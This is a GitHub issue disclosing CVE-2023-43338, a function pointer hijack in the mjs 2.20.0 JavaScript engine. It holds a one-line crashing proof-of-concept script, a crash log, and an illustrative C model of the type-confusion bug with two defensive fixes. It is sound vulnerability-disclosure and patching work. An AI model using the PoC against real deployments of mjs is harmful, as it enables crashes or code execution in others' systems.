Function Pointer Hijack mjs/mjs.c in mjs_execute
cla7aye15I4nd opened this issue · 1 comments
cla7aye15I4nd commented
Affected Projects
mjs 2.20.0 (https://github.com/cesanta/mjs)
Problem Type
CWE-822 (Untrusted Pointer Dereference)
Description
I discovered a vulnerability that could potentially lead to function pointer hijacking. I believe this is a logical vulnerability since it does not trigger any out-of-bounds (OOB) or use-after-free (UAF) assertions when compiled with AddressSanitizer. An attacker can exploit this vulnerability by providing a specially crafted input to the affected program, leading to the execution of arbitrary code.
The function hijack happened in mjs.c:8824:
call_stack_push_frame(mjs, bp.start_idx + i, retval_stack_idx);
/* Perform the cfunction call */
((void (*) (struct mjs *)) mjs_get_ptr(mjs, *func))(mjs);
call_stack_restore_frame(mjs);
PoC:
print-=2;print("A");
Log:
$ clang -g -O2 -o mjs mjs.c -DMJS_MAIN
$ ./mjs poc.js
Illegal instruction
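An added illustration, not code from mjs or from the reporter, of the bug pattern behind the PoC and the two checks that close it, using a toy tagged-value interpreter: `print -= 2` applies arithmetic to the payload of a function-typed value, so the tag still says "function" while the pointer bits are corrupted, and the later call dereferences them unchecked. The value encoding, `REGISTERED`, `sub_assign_*` and `call_cfunc_guarded` are assumptions of this model, not mjs's real layout or API.

```c
#include <stddef.h>
/* Toy tagged value: a tag plus a payload union. Constructed model for this
 * example, not mjs's real value encoding. */
typedef void (*cfunc_t)(void);
typedef enum { T_NUM, T_CFUNC } tag_t;
typedef struct { tag_t tag; union { double num; cfunc_t fn; } u; } val_t;

static int print_calls;                      /* observable side effect */
static void builtin_print(void) { print_calls++; }
static void builtin_len(void) { }
/* Allowlist of native functions the engine registered at startup. */
static const cfunc_t REGISTERED[] = { builtin_print, builtin_len };

static int is_registered(cfunc_t f) {
    for (size_t i = 0; i < sizeof REGISTERED / sizeof REGISTERED[0]; i++)
        if (REGISTERED[i] == f) return 1;
    return 0;
}

/* Bug pattern: arithmetic on the payload bits without checking the tag.
 * The tag still says "function" but the pointer bits are now garbage. */
static void sub_assign_unchecked(val_t *v, double d) { v->u.num -= d; }

/* Fix 1: refuse arithmetic on non-numeric values (a TypeError in a real engine). */
static int sub_assign_checked(val_t *v, double d) {
    if (v->tag != T_NUM) return -1;
    v->u.num -= d;
    return 0;
}

/* Fix 2 (defence in depth): validate the pointer against the allowlist right
 * before the indirect call; the call at mjs.c:8824 quoted above has none. */
static int call_cfunc_guarded(val_t v) {
    if (v.tag != T_CFUNC || !is_registered(v.u.fn)) return -1;
    v.u.fn();
    return 0;
}

/* Models `print -= 2; print("A")` on the unchecked path: returns 1 if the
 * value still carries the function tag but the guard rejects the call. */
static int scenario_unchecked(void) {
    val_t p = { T_CFUNC, { .fn = builtin_print } };
    sub_assign_unchecked(&p, 2.0);
    return p.tag == T_CFUNC && p.u.fn != builtin_print && call_cfunc_guarded(p) == -1;
}

/* Same script on the checked path: arithmetic refused, the call goes through. */
static int scenario_checked(void) {
    val_t p = { T_CFUNC, { .fn = builtin_print } };
    int before = print_calls;
    return sub_assign_checked(&p, 2.0) == -1 && call_cfunc_guarded(p) == 0
        && print_calls == before + 1;
}
```

The allowlist check is the cheap, engine-level equivalent of forward-edge CFI: even if another type-confusion path corrupts a function value, the only targets reachable through the cfunction call are the natives the engine itself registered.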
cla7aye15I4nd commented
Assigned CVE-2023-43338